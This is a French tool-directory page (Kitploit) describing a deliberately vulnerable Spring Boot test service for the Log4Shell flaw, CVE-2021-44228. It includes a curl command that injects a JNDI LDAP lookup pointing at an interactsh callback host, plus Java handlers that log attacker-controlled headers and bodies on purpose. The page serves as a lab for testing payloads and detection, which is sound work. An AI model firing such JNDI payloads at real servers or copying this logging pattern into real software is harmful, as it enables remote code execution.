Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service | Kitploit
Outils/GitHubGitHub/zsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubzsolt-halo/log4j-log4shell-cve-2021-44228-spring-boot-test-service

Log4J-Log4Shell-CVE-2021-44228-Spring-Boot-Test-Service

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
132il y a 4 ansPas encore vérifié

CVE-2021-44228 Service de test Spring Boot

Ceci est un projet spring boot hello world bricolé pour tester vos outils/payloads/capacités de détection en local avant de les utiliser sur des cibles en production.

La version de Log4j configurée est la 2.13.0

Construction de l'image docker

root@kitploit:~
bash build.sh

Exécution de l'image docker

root@kitploit:~
docker run -p 8080:8080 dwdi/log4shell

Test / Déclenchement de CVE-2021-44228

Si vous n'avez pas burp collaborator qui tourne dans le garage, vous pouvez visiter ce site pour une expérience similaire : https://interactsh.com

root@kitploit:~
curl -s --max-time 20 localhost:8080 -H 'User-Agent: ${jndi:ldap://<some_custom_identifier>.<your_generated_subdomain>.interactsh.com/a}' > /dev/null

Outil de scan

Optionnellement, vous pouvez utiliser ce superbe dépôt pour effectuer des scans locaux/massifs : https://github.com/adilsoybali/Log4j-RCE-Scanner

Emplacements de déclenchement

Cette vulnérabilité consiste à forcer une valeur contrôlée par l'utilisateur à être journalisée par le framework de journalisation vulnérable. Dans cette optique, cette simple application factice prend en charge deux verbes HTTP (GET/PUT) et un ensemble d'emplacements d'injection :

root@kitploit:~
@GetMapping("/")
	public String index(HttpServletRequest request) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		return "Log4J2 is working!";
	}
root@kitploit:~
@PostMapping("/")
	public String post(HttpServletRequest request, @RequestBody String body) {
		logger.info("Request URL: " + request.getRequestURL());
		logger.info("Request URI: " + request.getRequestURI());
		logger.info("Request Method: " + request.getMethod());
		logger.info("Request Query String: " + request.getQueryString());
		logger.info("Request Protocol: " + request.getProtocol());
		logger.info("Request Remote Address: " + request.getRemoteAddr());
		logger.info("Request Remote Host: " + request.getRemoteHost());
		logger.info("Request Remote Port: " + request.getRemotePort());
		logger.info("Request User Agent: " + request.getHeader("User-Agent"));
		logger.info("Request Body: " + body); // mind the extra request body
		return "Log4J2 is working!";
	}

Les contributions / améliorations sont les bienvenues.

Désolé pour la qualité du code :) ce projet n'est pas destiné à épater, mais à partager/aider.

Télécharger l’outil